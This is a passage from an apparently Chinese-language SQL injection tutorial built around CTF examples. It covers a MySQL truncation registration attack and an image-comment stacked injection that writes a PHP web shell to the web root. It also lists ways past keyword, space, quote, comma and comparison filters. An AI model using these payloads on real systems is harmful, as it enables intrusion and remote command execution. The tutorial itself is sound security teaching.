\"fail\";\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u73b0\u5728\u6211\u4eec\u6ca1\u6709\u7f16\u7801\u6216\u8005\u5355\u5f15\u53f7\u76f8\u5173\u7684\u95ee\u9898\uff0c\u4e3a\u4ec0\u4e48\u8fd8\u53ef\u80fd\u53d1\u751f\u6ce8\u5165\u5462\uff1f\u5173\u952e\u70b9\u5728\u4e8e\u5efa\u8868\u65f6\u6211\u4eec\u9650\u5236\u4e86username\u548cpassword\u7684\u957f\u5ea6\u6700\u5927\u4e3a25\uff0c\u5982\u679c\u6211\u4eec\u63d2\u5165\u7684\u6570\u636e\u957f\u5ea6\u8d85\u8fc725\uff0cMYSQL\u4f1a\u622a\u53d6\u524d\u8fb9\u768425\u4e2a\u5b57\u7b26\u8fdb\u884c\u63d2\u5165\uff0c\u800c\u5bf9\u4e8eselect\u8bf7\u6c42\uff0c\u5373\u4f7f\u67e5\u8be2\u7684\u6570\u636e\u8d85\u8fc725\u4e5f\u4e0d\u4f1a\u4ea7\u751f\u622a\u53d6\uff0c\u6211\u4eec\u8bbe\u60f3\u4e00\u4e2a\u653b\u51fb\u60c5\u666f\uff0c\u6211\u4eec\u6ce8\u518c\u4e00\u4e2a<code>username=admin[25\u4e2a\u7a7a\u683c]x&amp;password=123456<\/code>\u7684\u8d26\u53f7\uff0c\u670d\u52a1\u5668\u9996\u5148\u4f1a\u5224\u65ad\u8fd9\u4e2a\u7528\u6237\u662f\u5426\u5b58\u5728\uff0c\u4f7f\u7528\u7684\u8bed\u53e5\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username = <code>'admin&#91;25\u4e2a\u7a7a\u683c]x<\/code>'<\/code><\/pre>\n\n\n\n<p>\u663e\u7136\u662f\u4e0d\u53ef\u80fd\u67e5\u8be2\u51fa\u7ed3\u679c\u7684\uff0c\u4e0d\u4f1a\u5b58\u5728\u8fd9\u4e2a\u7528\u6237\uff0c\u56e0\u6b64\u4f1a\u6210\u529f\u6ce8\u518c\uff0c\u7f51\u7ad9\u5411\u6570\u636e\u5e93\u63d2\u5165\u4e00\u6761\u6570\u636e\uff0c\u7531\u4e8eMYSQL\u4f1a\u622a\u53d6\u524d\u8fb9\u768425\u4e2a\u5b57\u7b26\uff0c\u6240\u4ee5\u76f8\u5f53\u4e8e\u63d2\u5165\u7684\u6570\u636e\u5c31\u662f<code>username=admin&amp;password=123456<\/code> ,\u7136\u540e\u6211\u4eec\u7528\u5bc6\u7801123456\u5c31\u80fd\u6210\u529f\u767b\u5f55\u4e86\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9632\u5fa1<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7ed9username\u5b57\u6bb5\u6dfb\u52a0unique\u5c5e\u6027\u3002 <\/li>\n\n\n\n<li>\u4f7f\u7528id\u5b57\u6bb5\u4f5c\u4e3a\u5224\u65ad\u7528\u6237\u7684\u51ed\u8bc1\u3002 <\/li>\n\n\n\n<li>\u63d2\u5165\u6570\u636e\u524d\u5224\u65ad\u6570\u636e\u957f\u5ea6<\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">\u6587\u4ef6\u7c7b\u578b\u6ce8\u5165<\/h1>\n\n\n\n<p>\u5982\u679csql\u8bed\u53e5\u6bd4\u8f83\u7279\u6b8a\uff0c\u5373\u4f7f\u662f\u6587\u4ef6\u7c7b\u578b\u4e5f\u53ef\u4ee5\u8fdb\u884c\u6ce8\u5165\u3002\u4ee5ctfshow\u4e0a\u7684\u4f60\u6ca1\u89c1\u8fc7\u7684\u6ce8\u5165\u4e3a\u4f8b\uff0c\u8fd9\u4e2a\u9898\u7684\u4e0a\u4f20\u6587\u4ef6\u7684\u6e90\u7801\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$filename = md5(md5(rand(1,10000))).\".zip\";\n$filetype = (new finfo)-&gt;file($_FILES&#91;'file']&#91;'tmp_name']);\n$filepath = \"upload\/\".$filename;\n$sql = \"INSERT INTO file(filename,filepath,filetype) VALUES ('\".$filename.\"','\".$filepath.\"','\".$filetype.\"');\";\n<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u5bf9\u4e8efiletype\u4f7f\u7528\u4e86<code>finfo::file<\/code>\u53d6\u503c\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u83b7\u53d6\u6587\u4ef6\u7684\u5c5e\u6027\uff0c\u5305\u62ec\u56fe\u7247\u7684comment\uff0c\u800c\u4e00\u4e2a\u56fe\u7247\u7684comment\u6211\u4eec\u662f\u53ef\u63a7\u7684\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u5f88\u7b80\u5355\u4e86\uff0c\u6784\u9020\u6076\u610f\u7684comment\u62fc\u63a5sql\u8bed\u53e5\u5199\u9a6c\u5373\u53ef\u3002\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528exiftool\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>exiftool -overwrite_original -comment=\"y1ng\\\"');select 0x3C3F3D60245F504F53545B305D603B into outfile '\/var\/www\/html\/1.php';--+\" 1.jpg\n<\/code><\/pre>\n\n\n\n<p>\u6211\u8fd9\u91cc\u7528\u4e8616\u8fdb\u5236\u628a\u6076\u610f\u4ee3\u7801\u8f6c\u4e49\u4e86\u4e00\u4e0b\u9632\u6b62\u5f15\u53f7\u6709\u5e72\u6270\uff0c\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u5c31\u662f\u628a1.jpg\u7684comment\u6539\u6210<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>y1ng\\\"');select \"&lt;?=`$_POST&#91;0]`;\" into outfile '\/var\/www\/html\/1.php';--+<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6837\u6587\u4ef6\u4e0a\u4f20\u540e\u8bfb\u53d6\u6587\u4ef6\u7684\u5c5e\u6027\uff0c\u5b9e\u9645\u4e0a\u6267\u884c\u7684sql\u8bed\u53e5\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>INSERT INTO file(filename,filepath,filetype) VALUES ('1.jpg','\u6587\u4ef6\u8def\u5f84','y1ng\\\"');select 0x3C3F3D60245F504F53545B305D603B into outfile '\/var\/www\/html\/1.php';--+');<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u7528\u5806\u53e0\u6ce8\u5165\u6210\u529f\u5728\/var\/www\/html\/1.php\u5199\u5165\u4e86&lt;?=`$_POST[0]`\uff0c\u56e0\u6b64\u76f4\u63a5\u57281.php\u75280\u4f20\u53c2\u6267\u884c\u547d\u4ee4\u5373\u53ef(`\u5305\u88f9\u7684\u4ee3\u7801\u5728php\u91cc\u53ef\u4ee5\u76f4\u63a5\u547d\u4ee4\u6267\u884c)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-69.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"839\" height=\"721\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-69.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1660\"  sizes=\"auto, (max-width: 839px) 100vw, 839px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">3.Bypass\u6280\u5de7<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u9884\u7f16\u8bd1<\/h1>\n\n\n\n<p>sql\u6ce8\u5165\u5982\u679c\u4e0d\u8c08\u9884\u7f16\u8bd1\u5c31\u5931\u53bb\u4e86\u81f3\u5c11\u4e00\u534a\u7684\u4ef7\u503c\uff0c\u4e13\u95e8\u5355\u5f00\u4e86\u4e00\u7bc7\u6587\u7ae0\u5206\u6790<\/p>\n\n\n\n<p><a href=\"https:\/\/fushuling.com\/index.php\/2023\/10\/27\/%e9%a2%84%e7%bc%96%e8%af%91%e4%b8%8esql%e6%b3%a8%e5%85%a5\/\">\u9884\u7f16\u8bd1\u4e0esql\u6ce8\u5165<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u901a\u7528\u7ed5\u8fc7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u5927\u5c0f\u5199<\/h2>\n\n\n\n<p>\u9996\u5148\u8bb2\u6700\u5e38\u89c1\u7684\u51e0\u4e2a\uff0c\u5982\u679c\u8fd9\u4e2a\u7f51\u7ad9\u7684\u5f00\u53d1\u8005\u6bd4\u8f83\u8822\uff0c\u60f3\u8fc7\u6ee4select\u8fd9\u4e2a\u51fd\u6570\uff0c\u4f46\u4ed6\u662f\u8fd9\u4e48\u5199\u7684\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if (stripos($sql, 'select') !== false) {\n    throw new Exception('Invalid SQL query: SELECT statement not allowed');\n}\n\n\/\/ \u6267\u884c\u67e5\u8be2\u8bed\u53e5\n$result = $db-&gt;query($sql);<\/code><\/pre>\n\n\n\n<p>\u663e\u7136\uff0c\u8fd9\u4e2a\u8fc7\u6ee4\u53ea\u8fc7\u6ee4\u4e86select\u8fd9\u4e2a\u6b21\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5927\u5c0f\u5199\u6bd4\u5982\u53d8\u6210SelEct\u5373\u53ef\u8f7b\u677ebypass<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53cc\u5199\u7ed5\u8fc7<\/h2>\n\n\n\n<p>\u5047\u5982\u8fd9\u4e2a\u5f00\u53d1\u8005\u73b0\u5728\u7a0d\u5fae\u806a\u660e\u4e86\u4e00\u70b9\uff0c\u77e5\u9053\u8981\u62c9\u901a\u5339\u914d\u65e0\u8bba\u5927\u5c0f\u5199\uff0c\u4f46\u4ed6\u53ea\u662f\u5355\u7eaf\u7684\u628aselect\u5b57\u7b26\u4e32\u66ff\u6362\u4e3a\u7a7a:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sql = str_ireplace('select', '', $sql); #str_ireplace()\u4e0d\u533a\u5206\u5927\u5c0f\u5199<\/code><\/pre>\n\n\n\n<p>\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u53cc\u5199select\u628a\u5b83\u53d8\u6210seselectlect\u5373\u53ef\u8f7b\u677e\u7ed5\u8fc7\uff0c\u56e0\u4e3a\u6700\u540esql\u91cc\u63a5\u6536\u5230\u7684\u662f\u53bb\u9664\u4e86select\u7684\u5b57\u7b26\u4e32\uff0c\u6700\u540e\u8fd8\u662fselect\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6ce8\u91ca\u7b26<\/h2>\n\n\n\n<p>\u8fd9\u91cc\u8bb2\u4e24\u79cd\u5173\u952e\u5b57\u7ed5\u8fc7\u7684\u65b9\u6cd5\uff0c\u7528\u7684\u90fd\u662f\u6ce8\u91ca\u7b26\uff0c\u6bd4\u5982\u7528<code>unio&lt;&gt;n<\/code>\u4ee3\u66ffunion\uff0c\u7528<code>se\/**\/lect<\/code>\u4ee3\u66ffselect\uff0c\u8fd9\u4e24\u79cd\u65b9\u6cd5\u6211\u5728\u5f88\u591a\u6587\u7ae0\u91cc\u90fd\u89c1\u5230\u8fc7\u4e86\uff0c\u4f46\u6211\u5728\u6211\u672c\u5730\u90a3\u4e2aphpmyadmin\u91cc\u5c1d\u8bd5\u5374\u6ca1\u6cd5\u7b49\u6548\u4ee3\u66ff\uff0c\u4f1a\u51fa\u73b0\u62a5\u9519\uff0c\u6682\u65f6\u4e0d\u77e5\u9053\u8fd9\u79cd\u65b9\u6cd5\u7684\u5e94\u7528\u573a\u666f<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u6ce8\u91ca\u7b26<\/h1>\n\n\n\n<p>\u5982\u679c\u6ce8\u91ca\u7b26\u88abban\u4e86\u7684\u8bdd\u6211\u4eec\u5c31\u8981\u60f3\u529e\u6cd5\u95ed\u5408\u540e\u9762\u7684\u8bed\u53e5\u6784\u6210\u6c38\u771f\u3002\u6bd4\u5982\u8fd8\u662f\u8bf4\u5230\u7ea2\u5ca9\u676f\u62ff\u5230sql\u6ce8\u5165\u9898\uff0c\u56e0\u4e3a\u6211\u4eec\u6784\u9020\u7684\u6587\u4ef6\u540e\u9762\u4ee5.doc\u7ed3\u5c3e\uff0c\u6240\u4ee5\u76f4\u63a5\u52a0\u6ce8\u91ca\u7b26\u7684\u8bdd\u4f1a\u5bf9\u8bed\u53e5\u4ea7\u751f\u7834\u574f\uff0c\u8fd9\u65f6\u6211\u4eec\u7684\u9009\u62e9\u4fbf\u662f\u4e0a\u4f20\u4e00\u4e2a\u6587\u4ef6\u540d\u53eb\uff1a\u2019 and 1=2 union select xxx from xxx where \u2018.doc\u2019=\u2019.doc\uff0c\u8fd9\u6837\u6700\u540e\u7684\u5f15\u53f7\u5c31\u4f1a\u53d1\u751f\u95ed\u5408\uff0c\u53d8\u6210<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select '1' and 1=2 union select xxx from xxx where '.doc' = '.doc'<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u6784\u6210\u6c38\u771f\uff0c\u6bd4\u5982\u8fd9\u4e2a\u53e5\u5b50\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `sheet1` WHERE \u7528\u6237\u540d=\"$username\"<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u7528&#8221;||&#8221;1\u3001&#8221; or &#8220;1&#8221;=&#8221;1\uff0c\u751a\u81f3\u662f&#8221;union select  1,2,&#8221;3\u8fdb\u884c\u95ed\u5408<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u7a7a\u683c<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u7f16\u7801\u7ed5\u8fc7<\/h2>\n\n\n\n<p>%20 %09 %0a %0b %0c %0d %a0 %00 <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5185\u8054\u6ce8\u91ca<\/h2>\n\n\n\n<p>\/**\/  \/*\u5b57\u7b26\u4e32*\/ <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u62ec\u53f7\u7ed5\u8fc7<\/h2>\n\n\n\n<p>\u5373\u6dfb\u52a0\u62ec\u53f7\u4ee3\u66ff\u7a7a\u683c\uff0c\u6bd4\u5982\u6211\u4eec\u7684\u6b63\u5e38\u8bed\u53e5\u4e3a<code>SELECT \u7528\u6237\u540d FROM `sheet1`<\/code>\uff0c\u73b0\u5728\u6211\u4eec\u5c31\u53ef\u4ee5\u6539\u6210<code>SELECT(\u7528\u6237\u540d)FROM(`sheet1`)<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"289\" height=\"270\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1465\"\/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u5f15\u53f7<\/h1>\n\n\n\n<p>\u5728\u6211\u4eecsql\u6ce8\u5165\u7528\u8868\u540d\u67e5\u5217\u540d\u65f6\u4e00\u822c\u90fd\u8981\u7528\u5230\u5f15\u53f7\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select group_concat(column_name) from information_schema.columns where table_name=\"sheet1\"<\/code><\/pre>\n\n\n\n<p>sheet1\u65c1\u8fb9\u7684\u5f15\u53f7\u4e00\u53bb\u6389\u5c31\u4f1a\u62a5\u9519\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u628asheet1\u8fd9\u4e2a\u8868\u540d\u8f6c\u4e3a16\u8fdb\u5236\u5b57\u7b26\u4e32\uff0c\u8fd9\u6837\u5c31\u4e0d\u7528\u4f7f\u7528\u5f15\u53f7\u4e86\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"855\" height=\"227\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1468\"  sizes=\"auto, (max-width: 855px) 100vw, 855px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u9017\u53f7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">from to<\/h2>\n\n\n\n<p>\u76f2\u6ce8\u7684\u65f6\u5019\u4e3a\u4e86\u622a\u53d6\u5b57\u7b26\u4e32\uff0c\u6211\u4eec\u5f80\u5f80\u4f1a\u4f7f\u7528substr(),mid()\u3002\u8fd9\u4e9b\u5b50\u53e5\u65b9\u6cd5\u90fd\u9700\u8981\u4f7f\u7528\u5230\u9017\u53f7\uff0c\u5bf9\u4e8esubstr()\u548cmid()\u8fd9\u4e24\u4e2a\u65b9\u6cd5\u53ef\u4ee5\u4f7f\u7528from to\u7684\u65b9\u5f0f\u6765\u89e3\u51b3\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select substr(database() from 1 for 1);\nselect mid(database() from 1 for 1);<\/code><\/pre>\n\n\n\n<p>\u7b49\u4ef7\u4e8emid\/substr(database(),1,1)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528join<\/h2>\n\n\n\n<p>select 1,2\u7b49\u4ef7\u4e8eselect * from (select 1)a join (select 2)b<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528like<\/h2>\n\n\n\n<p>select ascii(mid(user(),1,1))=114\u7b49\u4ef7\u4e8eselect user() like &#8216;r%&#8217;\uff0c\u5373\u9010\u4e2a\u5b57\u7b26\u4e32\u6bd4\u8f83\uff0c\u6211\u4eec\u53ef\u4ee5\u66b4\u529b\u7834\u89e3%\u524d\u7684\u5b57\u7b26\u4e32\uff0c\u76f4\u5230\u7206\u7834\u51faselect user() like &#8216;root@localhost&#8217;\uff0c\u5f97\u5230\u771f\u6b63\u7684\u7528\u6237\u540d<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528offset<\/h2>\n\n\n\n<p>\u76f2\u6ce8\u7684\u65f6\u5019\u9664\u4e86substr()\u548cmid()\u9700\u8981\u4f7f\u7528\u9017\u53f7\uff0climit\u4e5f\u4f1a\u4f7f\u7528\u9017\u53f7\uff0c\u6bd4\u5982\u8bed\u53e5<code>select * from sheet1 limit 0,1 <\/code>,\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528<code>select * from sheet1 limit 1 offset 0<\/code> \u7b49\u6548\u66ff\u4ee3<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7\u6bd4\u8f83\u7b26\u53f7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">greatest()\u3001least()<\/h2>\n\n\n\n<p>\u6709\u65f6\u5019\u6211\u4eec\u5199\u811a\u672c\u4f1a\u7528\u5230\u4e8c\u5206\u6cd5\uff0c\u7279\u522b\u662f\u76f2\u6ce8\u7684\u65f6\u5019\uff0c\u6bd4\u5982\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and ascii(substr(database(),1,1))&gt;64<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u540e\u9762\u7684\u6761\u4ef6\u6210\u7acbdatabase\u540d\u79f0\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26ascii\u7801\u5927\u4e8e64\uff0c\u8bed\u53e5\u5219\u4f1a\u6709\u6b63\u5e38\u56de\u663e\uff0c\u8fd9\u65f6\u5982\u679c\u5927\u4e8e\u53f7\u5c0f\u4e8e\u53f7\u90fd\u88abban\u4e86\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528greatest()\u3001least()\u8fdb\u884c\u4ee3\u66ff\uff0c\u5982\u4ee5greatest(n1,n2,n3,\u2026)\u4e3a\u4f8b\uff0c\u5b83\u4f1a\u8fd4\u56de\u8fd9\u4e9b\u5b57\u7b26\u91cc\u7684\u6700\u5927\u503c\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u4e0a\u9762\u7684\u8bed\u53e5\u6539\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and greatest(ascii(substr(database(),1,1)),64)=64<\/code><\/pre>\n\n\n\n<p>\u4f5c\u7528\u548c\u4e0a\u9762\u76f8\u540c\uff0c\u5982\u679cdatabase\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e0d\u662f\u8fd9\u91cc\u6700\u5927\u7684\u5219\u4f1a\u8fd4\u56de64\uff0cand\u540e\u9762\u6210\u7acb\uff0c\u53cd\u4e4b\u82e5\u5927\u4e8e64\u540e\u9762\u7684\u5f0f\u5b50\u4e0d\u6ee1\u8db3\u4e5f\u5c31\u4e0d\u4f1a\u6709\u56de\u663e\u4e86\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">between\u6ce8\u5165<\/h2>\n\n\n\n<p>\u8fd8\u662f\u8fd9\u4e2a\u8bed\u53e5\uff1aselect * from sheet1 where \u7528\u6237\u540d=&#8221;admin&#8221; and ascii(substr(database(),1,1))&gt;64\uff0c\u5176\u5b9e\u6211\u4eec\u4e5f\u53ef\u4ee5\u7528between\u5224\u65addatabase()\u9996\u4f4d\u5b57\u7b26\u7684\u5927\u5c0f\uff0c\u6bd4\u5982\u6539\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and ascii(substr(database(),1,1)) between 64 and 128 <\/code><\/pre>\n\n\n\n<p>\u4e5f\u5c31\u662f\u628a\u903b\u8f91\u6539\u6210\u5224\u65adascii\u503c\u662f\u5426\u572864\u548c128\u4e4b\u95f4\uff0c\u5373\u662f\u5426\u5927\u4e8e64\uff0c\u5982\u679c\u60f3\u4f7f\u7528\u5c0f\u4e8e\u4e5f\u53ef\u4ee5\u8fd9\u4e48\u5224\u65ad\uff0c\u7a0d\u5fae\u6539\u6539\u5373\u53ef\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7ed5\u8fc7or and xor not<\/h1>\n\n\n\n<pre class=\"wp-block-code\"><code>and=&amp;&amp;\nor=|| \nxor=^\nnot=!<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\" id=\"h3-23\">\u7ed5\u8fc7\u7b49\u4e8e\u53f7<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u6bd4\u8f83\u7b26<\/h2>\n\n\n\n<p>\u5c31\u662f\u7528\u4e8c\u5206\u7684\u65b9\u5f0f\u627e\u5230\u786e\u5207\u503c\u5373\u53ef\uff0c\u4e0a\u9762\u8fd8\u6709\u66ff\u6362\u6bd4\u8f83\u7b26\u7684\u4e00\u4e9b\u65b9\u6cd5<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">like <\/h2>\n\n\n\n<p>like\u6709\u4e24\u4e2a\u6a21\u5f0f\uff1a_\u548c%<\/p>\n\n\n\n<p>_\uff1a\u8868\u793a\u5355\u4e2a\u5b57\u7b26\uff0c\u7528\u6765\u67e5\u8be2\u5b9a\u957f\u7684\u6570\u636e<\/p>\n\n\n\n<p>%\uff1a\u8868\u793a0\u4e2a\u6216\u591a\u4e2a\u4efb\u610f\u5b57\u7b26<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\uff081\uff09SELECT * FROM Persons  WHERE City LIKE 'N%'     \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u4ee5 \"N\" \u5f00\u59cb\u7684\u57ce\u5e02\u91cc\u7684\u4eba\n\uff082\uff09SELECT * FROM Persons  WHERE City LIKE '%g'     \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u4ee5 \"g\" \u7ed3\u5c3e\u7684\u57ce\u5e02\u91cc\u7684\u4eba\n\uff083\uff09SELECT * FROM Persons   WHERE City LIKE '%lon%'  \u4ece \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u5305\u542b \"lon\" \u7684\u57ce\u5e02\u91cc\u7684\u4eba\n\uff084\uff09SELECT * FROM Persons   WHERE City NOT LIKE '%lon%'  \u4ece \"Persons\" \u8868\u4e2d\u9009\u53d6\u5c45\u4f4f\u5728\u4e0d\u5305\u542b \"lon\" \u7684\u57ce\u5e02\u91cc\u7684\u4eba<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u8bed\u53e5<code>SELECT * FROM `test` where id =1 and (substr(database(),1,1)=\"t\")<\/code>\u53ef\u4ee5\u7b49\u6548\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `test` where id =1 and (database() like \"t%\")<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">rlike \u3001regexp<\/h2>\n\n\n\n<p>\u8fd9\u4fe9\u5c31\u662f\u4eb2\u5144\u5f1f\uff0c\u7528\u6cd5\u4e00\u6837\u7684\uff0c\u4e3b\u8981\u4f5c\u7528\u5c31\u662f\u52a0\u4e86\u6b63\u5219\u5339\u914d\u7684\u76f8\u5173\u7528\u6cd5<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong>1\u3001\u6a21\u7cca\u67e5\u8be2\u5b57\u6bb5\u4e2d\u5305\u542b\u67d0\u5173\u952e\u5b57\u7684\u4fe1\u606f\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u5305\u542b\u201c\u5e0c\u671b\u201d\u7684\u4fe1\u606f\uff1aselect * from student where name rlike &#8216;\u5e0c\u671b&#8217;<br><br><strong>2\u3001\u6a21\u7cca\u67e5\u8be2\u67d0\u5b57\u6bb5\u4e2d\u4e0d\u5305\u542b\u67d0\u5173\u952e\u5b57\u4fe1\u606f\u3002<br><\/strong>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u4e0d\u5305\u542b\u201c\u5e0c\u671b\u201d\u7684\u4fe1\u606f\uff1aselect * from student where name not rlike &#8216;\u5e0c\u671b&#8217;<br><br><strong>3\u3001\u6a21\u7cca\u67e5\u8be2\u5b57\u6bb5\u4e2d\u4ee5\u67d0\u5173\u952e\u5b57\u5f00\u5934\u7684\u4fe1\u606f\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u4ee5\u201c\u5927\u201d\u5f00\u5934\u7684\u4fe1\u606f\uff1aselect * from student where name  rlike &#8216;^\u5927&#8217;<br><br><strong>4\u3001\u6a21\u7cca\u67e5\u8be2\u5b57\u6bb5\u4e2d\u4ee5\u67d0\u5173\u952e\u5b57\u7ed3\u5c3e\u7684\u4fe1\u606f\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u6240\u6709\u4ee5\u201c\u5927\u201d\u7ed3\u5c3e\u7684\u4fe1\u606f\uff1aselect * from student where name rlike 